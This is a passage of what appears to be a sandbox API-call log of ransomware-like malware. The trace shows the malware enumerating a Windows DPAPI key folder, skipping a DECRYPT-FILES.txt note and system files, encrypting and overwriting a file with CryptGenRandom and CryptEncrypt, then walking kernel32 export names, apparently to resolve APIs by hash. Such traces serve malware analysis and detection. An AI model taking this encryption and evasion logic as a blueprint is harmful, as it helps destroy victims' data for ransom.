(lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0180.788] lstrlenW (lpString="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f") returned 42 [0180.788] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.788] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f" [0180.788] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.788] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.jr60f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.788] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=732) returned 1 [0180.789] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.789] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.789] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.789] CloseHandle (hObject=0x280) returned 1 [0180.790] CloseHandle (hObject=0x27c) returned 1 [0180.790] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.790] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaadddf80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaadddf80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaadddf80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.790] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.790] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x17ffec90, ftCreationTime.dwHighDateTime=0x1d3373c, ftLastAccessTime.dwLowDateTime=0x17ffec90, ftLastAccessTime.dwHighDateTime=0x1d3373c, ftLastWriteTime.dwLowDateTime=0xaaee8920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ", cAlternateFileName="FBBE72~1.ZVK")) returned 1 [0180.790] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ", lpString2="DECRYPT-FILES.txt") returned 1 [0180.790] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ", lpString2="autorun.inf") returned 1 [0180.790] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ", lpString2="boot.ini") returned 1 [0180.790] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ", lpString2="desktop.ini") returned 1 [0180.790] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ", lpString2="ntuser.dat") returned -1 [0180.790] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ", lpString2="iconcache.db") returned -1 [0180.790] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ", lpString2="bootsect.bak") returned 1 [0180.790] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ", lpString2="ntuser.dat.log") returned -1 [0180.790] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ", lpString2="thumbs.db") returned -1 [0180.790] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ", lpString2="Bootfont.bin") returned 1 [0180.790] lstrlenW (lpString="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ") returned 43 [0180.790] lstrcmpiW (lpString1="ZVKiUJ", lpString2="lnk") returned 1 [0180.790] lstrcmpiW (lpString1="ZVKiUJ", lpString2="exe") returned 1 [0180.790] lstrcmpiW (lpString1="ZVKiUJ", lpString2="sys") returned 1 [0180.790] lstrcmpiW (lpString1="ZVKiUJ", lpString2="dll") returned 1 [0180.790] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0180.790] lstrlenW (lpString="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ") returned 43 [0180.790] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.790] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ" [0180.790] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.zvkiuj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.791] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=732) returned 1 [0180.791] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.791] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.792] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.792] CloseHandle (hObject=0x280) returned 1 [0180.792] CloseHandle (hObject=0x27c) returned 1 [0180.792] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.792] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x542fc610, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x542fc610, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaaf0ea80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred.PFB0YHS", cAlternateFileName="PREFER~1.PFB")) returned 1 [0180.792] lstrcmpiW (lpString1="Preferred.PFB0YHS", lpString2="DECRYPT-FILES.txt") returned 1 [0180.792] lstrcmpiW (lpString1="Preferred.PFB0YHS", lpString2="autorun.inf") returned 1 [0180.792] lstrcmpiW (lpString1="Preferred.PFB0YHS", lpString2="boot.ini") returned 1 [0180.792] lstrcmpiW (lpString1="Preferred.PFB0YHS", lpString2="desktop.ini") returned 1 [0180.792] lstrcmpiW (lpString1="Preferred.PFB0YHS", lpString2="ntuser.dat") returned 1 [0180.792] lstrcmpiW (lpString1="Preferred.PFB0YHS", lpString2="iconcache.db") returned 1 [0180.792] lstrcmpiW (lpString1="Preferred.PFB0YHS", lpString2="bootsect.bak") returned 1 [0180.792] lstrcmpiW (lpString1="Preferred.PFB0YHS", lpString2="ntuser.dat.log") returned 1 [0180.792] lstrcmpiW (lpString1="Preferred.PFB0YHS", lpString2="thumbs.db") returned -1 [0180.792] lstrcmpiW (lpString1="Preferred.PFB0YHS", lpString2="Bootfont.bin") returned 1 [0180.792] lstrlenW (lpString="Preferred.PFB0YHS") returned 17 [0180.792] lstrcmpiW (lpString1="PFB0YHS", lpString2="lnk") returned 1 [0180.793] lstrcmpiW (lpString1="PFB0YHS", lpString2="exe") returned 1 [0180.793] lstrcmpiW (lpString1="PFB0YHS", lpString2="sys") returned -1 [0180.793] lstrcmpiW (lpString1="PFB0YHS", lpString2="dll") returned 1 [0180.793] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0180.793] lstrlenW (lpString="Preferred.PFB0YHS") returned 17 [0180.793] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.793] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="Preferred.PFB0YHS" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.PFB0YHS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.PFB0YHS" [0180.793] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.PFB0YHS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred.pfb0yhs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.793] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=288) returned 1 [0180.793] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.793] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.794] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0180.794] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0180.794] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.794] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0180.794] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0180.795] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.795] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.795] CloseHandle (hObject=0x280) returned 1 [0180.795] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.795] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0180.796] CloseHandle (hObject=0x0) returned 0 [0180.796] CloseHandle (hObject=0x27c) returned 1 [0180.796] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.796] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.797] GetTickCount () returned 0x1134a2b [0180.797] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.797] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0180.797] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0180.798] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.798] lstrlenA (lpString="kernel32.dll") returned 12 [0180.798] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0180.798] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0180.798] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0180.798] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0180.798] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0180.798] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0180.798] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0180.798] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0180.798] lstrlenA (lpString="ADDATOMA") returned 8 [0180.798] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0180.798] lstrlenA (lpString="ADDATOMW") returned 8 [0180.798] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0180.798] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0180.798] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0180.798] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0180.798] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0180.798] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0180.798] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0180.798] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0180.799] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0180.799] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0180.799] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0180.799] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0180.799] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0180.799] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0180.799] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0180.799] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0180.799] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0180.799] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0180.799] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0180.799] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0180.799] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0180.799] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0180.799] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0180.799] lstrlenA (lpString="BACKUPREAD") returned 10 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0180.799] lstrlenA (lpString="BACKUPSEEK") returned 10 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0180.799] lstrlenA (lpString="BACKUPWRITE") returned 11 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0180.799] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0180.799] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0180.800] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0180.800] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0180.800] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0180.800] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0180.800] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0180.800] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0180.800] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0180.800] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0180.800] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0180.800] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0180.800] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0180.800] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0180.800] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0180.800] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0180.800] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0180.800] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0180.800] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0180.800] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0180.800] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0180.800] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0180.801] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0180.801] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0180.801] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0180.801] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0180.801] lstrcpyA (in: lpString1=0x36fce30, 